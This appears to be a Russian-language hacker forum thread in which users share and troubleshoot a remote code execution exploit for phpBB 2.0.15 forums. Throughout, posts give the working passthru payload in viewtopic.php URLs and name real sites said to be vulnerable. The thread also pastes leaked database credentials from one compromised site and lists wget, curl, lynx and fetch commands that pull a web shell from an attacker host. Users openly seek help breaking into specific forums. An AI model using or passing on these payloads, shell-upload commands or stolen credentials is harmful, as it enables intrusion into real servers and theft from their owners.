Вот вам сплоит . Ждите видео
http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'

нифига себе щас попробуем!))

чето не работает сплойт((

Сам ты не работаешь все пашет бери после viewtopic.php?t=243

а у меня вот что отвечает - "Темы, которую вы запросили, не существует"....
В чем моя ошибка?

надо с запросе подставить t=номер существующей темы

а вы что делайте разви почле него не сушествуюший темы не надо тыкать НАРОД сначала зайдите на тему . Бага на других версия не пашет я вчера проверил=((

Не работает... Вот к примеру: http://webportal.kpiservice.com.ua/forum/viewtopic.php?t=45

ХЗ братцы у меня тоже не на всех пашет сплоит

всё нормально работает, тока вот искать нужно бажный форум.. берёте и любой форум.. открываете топ, где ОДНО СООБЩЕНИЕ (тогда будет всего ОДНО повторение выполненяемой команды...) и вставляем после номера виевтопика:
&highlight='.passthru($HTTP_GET_VARS[cmd]).'&cmd=id

и работаем =))) кстати через поиск в яндексе есть несколько форумов бажных =)) исчите =)) (ЗЫ: всего-то там 4 страницы)...

кстати.. 70% в 15-ой верссии внизу где powered номер версии форума не указывается.. а пишется 2002-2005 =)) нада искать =)

Ну вот сломал. И что дальше. config.php украл. толку от него маловато... Подскажите... Как может хэш админа или БД скомуниздить?

а залить ремвиев не можешь??КЛез нееее я работаю)))

http://www.tavernaclub.com/viewtopic.php?t=54218
ВОТ ТУТ ПРОКАТЫВАЕТ )))

Сплойт на Python,
http://www.security.nnov.ru/files/phpbbex.py

Ну а как его заливать? Какие нада права у папки? Я не нашел rwx-rwx-rwx.... Или может ещё какие нада права, что б выполнялся скрипт и я мог его залить... А то ничерта не могу...

помогите пожалуйчста, вот я вставил как надо, прокатило вроде, мне выдался списовк файлов и больше ничего, конфига нету, паролей к базе данных всмысле.

temon ты эта: config.php открой посмотри в HTML коде =))) Прокатит...
Повторяю свой вопрс: Какие нада права у папки? Я не нашел rwx-rwx-rwx.... Или может ещё какие нада права, что б выполнялся скрипт и я мог его залить... А то ничерта не могу...

про права я не помню эти буковки))попробуй в images или tmp, да и вобще дай ссылку....динар по этой ссылке говорит что нету такой темы..

Прописал я сплойт и сообщение которое было в это теме пменялось на:
pan style="font-weight: bold"a href="http://www.ww2.ru" target="_blank" class="postlink"/a/spana href="http://www.ww2.ru" target="_blank"/aspan style="font-weight: bold"/spana href="http://www.ww2.ru/category.php?id=12" target="_blank" class="postlink"/aa href="http://www.ww2.ru/category.php?id=26" target="_blank" class="postlink"/aa href="http://www.ww2.ru/category.php?id=11" target="_blank" class="postlink"/aa href="http://www.ww2.ru/category.php?id=13" target="_blank" class="postlink"/aa href="http://www.ww2.ru/category.php?id=34" target="_blank" class="postlink"/aspan style="font-weight: bold"a href="http://www.ww2.ru" target="_blank" class="postlink"/a/spa
больше не чего не произошло :(
Мож я что делаю не так ?

Плчему никто видео не снимет?

про права я не помню эти буковки))попробуй в images или tmp, да и вобще дай ссылку....динар по этой ссылке говорит что нету такой темы..

Попробуй другой топик открыть

На некоторых форумах выдаётся вот такая штука!!!
Fatal error: Call to undefined function phpbb_rtrim() in /pub/home/motorolk/motor/forum/viewtopic.php on line 498

Чё это такое?

http://soft.blend.ru/forum/viewtopic.php?t=123&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'

А чё дальше то делать?

Как шелл залить в форум ??? :confused:

http://soft.blend.ru/forum/viewtopic.php?t=123&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'

А чё дальше то делать?

Как шелл залить в форум ??? :confused:

$dbms = 'mysql';

$dbhost = 'localhost';
$dbname = 'blend129_form';
$dbuser = 'blend129_form';
$dbpasswd = '109033';

Подскажите плиз, как спомощью вот этого (http://target/forum/viewtopic.php?t=536&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).')
можно залить файлы на сервак ?

Ну есть масса способов..
можешь через exec() залить..
но проще узнать сначала БД (в файле конфига). Может логин и пасс и для фтп подойдут).

Rebz, приведи для начинающих пример этой команды плизз

Я немного не в ту степь пошёл.. =)
Попробуй wget-ом.. если он не поддерживается, то можно lynx-ом.
Синаксис такой:

lynx -source http://здесь_урл_шелла/shell.php>>1.php
после знака >> мы вводим название, которое будет на сайте служить вам шеллом. Также можно сразу указать др.путь, например, .... >>./images/1.php (ваш шелл будет записан в папку images).
Ну и т.д. по аналогии...

temon ты эта: config.php открой посмотри в HTML коде =))) Прокатит...
Повторяю свой вопрс: Какие нада права у папки? Я не нашел rwx-rwx-rwx.... Или может ещё какие нада права, что б выполнялся скрипт и я мог его залить... А то ничерта не могу...
как его открыть подробнее пожалуйста напиши.

Я тут новенький. У меня возникли вопросы что делать после того как я узнал пароль
к БД? и еще - эта уязвимость только к phpbb 2.0.15? (к прешедствующим версиям не идет?)

www.[target].ru/viewtopic.php?t=4&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'&cmd=id
выдает:

uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500что

дальше делать подскажите, Плизз

Команды Unix выучи потом поймешь =))).

Я даже видео снял вот что то его не публикуют =((((.

и правильно что не публикуют, Кез, молодец -)) не нужно там пол инета хакнутого... пройдет время и можно буит =)

Ну в чём то ты прав а в чём то нет. Пусть другой форум ставят о не этот с уязвимостью.

SanyaX, скинь на webfile.ru потом даш мне код =)) :D

На главной странице где коментарии там есть ссылка на експлойт с расширением php.

SanyaX, я имел виду видео который ты снял...

не знаю как отрагирует администрация от этого.

SanyaX, у тя типа получилось =))

Не понял что получилось?

Форум хакнуть =))
Скинь нам видео с SK | Heaton'om на вебфайл и скажи пасс от него =))

Форум хакнуть =))
Скинь нам видео с SK | Heaton'om на вебфайл и скажи пасс от него =))

я уже вчера получил и просмотрел =)) у него почти получилось. Просто он не смог залить шелл.. Ну это уже кому как повезет с жертвой =))

слушайте а нах вам шелл заливать?кто качал последний выпуск езина от Мазы тот знает что там лежит измененный сплойт для пхпбб 2.0.15 и очень отлично работает и прост в управлении..

Народ, хоть тресни не могу понять как скачать или залить файл с\на сервер. Не могу составить запрос wget`ом. Помогите плиз.

хм я ощущаю себя маленькой собачкой которой показали вкусный кусок мяса а потом подвесили на прилачно расстоянии да так что мне до него не подпрыгнуть !!!=(

Вот сижу облизываюсь и хочу всех убить !!!!!!!!!!

mamont, но но !!!

2 mamont Ну что ты не понимаешь ТО??? Тебе дали сплоит вот и юзай .

вопервых я не могу создать для него среду по некоторым приченам =(
а биплатного шела вот неделю не могу найти чбы wget хотябы работал =(

может кто подскажет сайтик где халява на шелл ????

дааа, с wget'ом траблемка-то вышла...у меня тоже не заработал :(

Так может там просто не wget стоит, а например feetch или curl? :)

верняк... сначала посмотрите какая качалка стоит.. потом права куда скачиваете.. и всё тип-топ =)

Млииин ну вы даете, трудно почитать книжек, мануалов чтоль.......
Вот споссобы закачек, еси один не работает то заработает другой

метод wget:
wget http://attacker/shellfile -o /папка

метод fetch:
fetch -p http://attacker/shellfile -o /папка

метод lynx:
lynx -source http://attacker/shellfile > /папка

метод links:
links -source http://attacker/shellfile > /папка

метод curl:
curl http://attacker/shellfile -o /папка

метод GET:
GET http://attacker/shellfile > /папка

Перепробовал все описаные способы нифига не получилось. :( может просто руки кривые.
Помогите взломать http://в просьбы о взломах/forum/.

ph0en1x, если судить по тесту на определение версии, то форум принадлежит к 2.0.19, а не 2.0.15. Тогда тебе в поиск, там был эксплоит, правда он даалееекоо не везде работает.
ЗЫ Если удастся взломать его - дай мне знать, сколько не бьюсь над 19-м - нифига не получается :(

Если удастся взломать его - дай мне знать, сколько не бьюсь над 19-м - нифига не получается :(А чо над ним биться то, всё равно ничего не получится. Ну только если у тебя есть логин и пасс админа или на форуме стоит мод смены стиля форума с главной страницы.

Есть два сплойта к 19.
Один: для выполнения команд если имеем логин и пасс админа.
Второй (наверное тот который ты имел ввиду): реализовать уязвимость можно только на форумах где стоит мод смены стиля форума с главной страницы (таких не очень много).

bandera, ну это я знаю. Там же вроде xss была? Не бывает такого, что взломать нельзя. Особенно у phpBB :)